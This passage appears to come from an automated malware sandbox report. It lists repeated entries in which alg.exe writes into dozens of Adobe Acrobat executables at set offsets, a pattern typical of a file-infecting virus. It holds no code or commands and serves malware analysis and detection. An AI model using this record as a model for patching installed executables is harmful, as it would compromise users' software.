Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 605260	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 605184	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 12684	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 332800	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 906316	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 906240	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 232412	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 3571200	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 4144716	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 4144640	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 1485948	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 59362816	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 59936332	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 59936256	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 140924	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 3571200	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 4144716	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 4144640	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 1485948	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 59362816	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 59936332	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 59936256	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 140924	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 50176	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 623692	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 623616	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 24668	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 328192	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 901708	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 901632	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 4988	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 642048	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 1215564	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 1215488	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 132252	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 11459072	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 12032588	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 12032512	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 4630732	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 192512	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 766028	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 765952	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 95345	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 759296	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 1332812	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 1332736	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 285633	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 385536	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 959052	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 958976	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 182364	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 123904	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 697420	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 697344	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 66716	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 1102848	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 1676364	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 1676288	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 753617	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 2531840	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 3105356	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 3105280	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 1150992	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 459776	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 1033292	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 1033216	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 209348	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 99840	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 673356	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 673280	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 69527	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 256512	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 830028	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 829952	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 72028	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 521216	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 1094732	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 1094656	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 321696	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 210944	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 784460	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 784384	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 126840	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 13312	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 586828	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 586752	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 2828	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 4785664	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 5359180	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 5359104	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 2430581	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 632832	Jump to behavior
